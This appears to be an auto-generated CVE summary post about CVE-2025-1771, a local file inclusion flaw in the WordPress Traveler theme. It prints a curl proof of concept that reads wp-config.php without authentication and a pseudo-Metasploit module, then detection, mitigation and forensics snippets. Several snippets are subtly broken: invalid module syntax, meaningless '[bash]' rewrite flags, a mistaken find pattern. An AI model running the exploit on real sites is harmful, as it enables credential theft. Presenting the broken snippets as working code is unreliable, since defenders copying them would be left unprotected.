How CVE-2025-1771 Works
The vulnerability exists in the `hotel_alone_load_more_post` function of the Traveler theme (≤ v3.1.8), where user-supplied input via the `style` parameter is improperly sanitized. Attackers can manipulate this parameter to perform path traversal (e.g., ../../../wp-config.php) and include arbitrary local files. If PHP files are included, server-side code execution occurs. This flaw bypasses authentication, enabling attackers to leak sensitive data (database credentials, user info) or execute malicious payloads if file uploads are permitted.
DailyCVE Form
Platform: WordPress
Version: ≤ 3.1.8
Vulnerability: LFI
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation
1. Curl PoC:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" \ -d "action=hotel_alone_load_more_post&style=../../../wp-config.php"
2. Metasploit Module:
module.exploit('wordpress/traveler_lfi') do |r|
r.target_uri.path = '/wp-admin/admin-ajax.php'
r.post_data = { 'action' => 'hotel_alone_load_more_post', 'style' => '../../malicious.php' }
end
Detection
1. Log Analysis:
grep "hotel_alone_load_more_post.style=" /var/log/apache2/access.log
2. WAF Rule:
if ($args ~ "style=.../") { return 403; }
Mitigation
1. Patch: Upgrade to Traveler Theme > v3.1.8.
2. .htaccess Restriction:
<FilesMatch "admin-ajax\.php">
RewriteCond %{QUERY_STRING} style=.../ [bash]
RewriteRule ^ - [bash]
</FilesMatch>
3. PHP Hardening:
// Disable remote/file inclusion php_admin_flag allow_url_include off
Forensics
1. Timeline Analysis:
find /var/www/html -type f -name ".php" -mtime -7 -exec ls -la {} \;
2. YARA Rule:
rule traveler_lfi {
strings: $s = "hotel_alone_load_more_post"
condition: $s and all of them
}
References
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1771
Extra Source Hub:
Undercode
